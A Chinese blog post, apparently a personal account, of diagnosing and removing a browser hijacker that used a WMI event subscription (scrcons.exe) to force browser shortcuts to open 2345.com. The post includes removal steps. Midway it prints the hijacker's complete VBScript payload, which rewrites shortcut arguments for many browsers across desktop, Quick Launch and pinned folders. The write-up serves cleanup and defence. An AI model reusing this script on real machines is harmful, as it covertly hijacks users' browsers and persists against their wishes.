Chrome被hao123.com等惡意連結劫持真正解決方法
阿新 • • 發佈:2019-01-23
某日,因想下載verycd.com的資源,搜尋到一個verycd連結檢視器(具體原因不表,你懂),結果就真得吃了蒼蠅了!……
既無法查到下載連結,直接將之刪除。然而發現,再開啟瀏覽器就被直接跳轉到
http://www.2345.com/頁面了,而且開啟多個瀏覽器:Chrome, Firefox, Opera, Safari,
iexplorer, maxthon,均相同症狀,檢查瀏覽器首頁設定——均正常!
最後發現,原來快速啟動欄的快捷命令被其修改,修改後的類似如下:
“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”
http://www.2345.com/?kunown
於是認為就是普通的修改快捷方式,手工刪除“http://www.2345.com/?kunown”部分。但好景不長,半小時後再次被更改了,這才認定——系統被蛀了~!
本機安裝有norton,未檢出問題。
又安裝了超級兔子、360、exterminateit等工具進行檢查,也未檢出……,果斷將其全部解除安裝……(超級兔子解除安裝後發現還留有其自帶瀏覽器垃圾未刪除!!!真夠垃圾~!手工將其解除安裝,不多贅述!)
開啟ProcessMonitor進行監視,發現每隔30分鐘出現一個scrcons.exe程序自動啟動並修改快速啟動欄的命令,然後自動關閉(幸虧是30分鐘一次,你要是24小時一次,那我就杯具了……),修改win7下opera快速啟動圖示路徑類似如下:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet\Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
r
Name=”unown”,選擇view instant properties,如下圖:
具體程式碼如下:
On Error Resume Next:Const link =
“http://www.2345.com/?kunown”:browsers = Array(“IEXPLORE.EXE”,
“chrome.exe”, “firefox.exe”, “360chrome.exe”, “360SE.exe”,
“SogouExplorer.exe”, “opera.exe”, “Safari.exe”, “Maxthon.exe”,
“TTraveler.exe”, “TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”,
“QQBrowser.exe”):Set oDic =
CreateObject(“scripting.dictionary”):For Each browser In
browsers:oDic.Add LCase(browser), browser:Next:Set fso =
CreateObject(“Scripting.Filesystemobject”):Set WshShell =
CreateObject(“Wscript.Shell”):strDesktop =
“C:\Users\Gemini\Desktop”:strAllUsersDesktop =
WshShell.SpecialFolders(“AllUsersDesktop”):QuickLaunch =
“C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick
Launch”:UserPinnedStartMenu = QuickLaunch & “\User
Pinned\StartMenu”:UserPinnedTaskBar = QuickLaunch &
“\User Pinned\TaskBar”:For Each file In
fso.GetFolder(strDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:For Each file In
fso.GetFolder(strAllUsersDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:If
fso.FolderExists(QuickLaunch) Then:For Each file In
fso.GetFolder(QuickLaunch).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedStartMenu) Then:For Each file In
fso.GetFolder(UserPinnedStartMenu).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedTaskBar) Then:For Each file In
fso.GetFolder(UserPinnedTaskBar).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If
最後,清除方法:在WMI event
viewer中將“ _EventFilter:Name=”unown_filter””專案右鍵刪除!
刪不掉?
到WMITool安裝路徑(例如:C:\Program Files
(x86)\WMI Tools)下,右鍵點選wbemeventviewer.exe,選擇以管理員身份執行!刪之!
還沒完,還要手動將快速啟動欄中,將各個瀏覽器快捷命令中的http://www.2345.com/?kunown去掉!
暫時就這麼多了,還有沒有其它影響的話,用用再看吧!
嗯,好歹這蒼蠅到底還是吐出去了!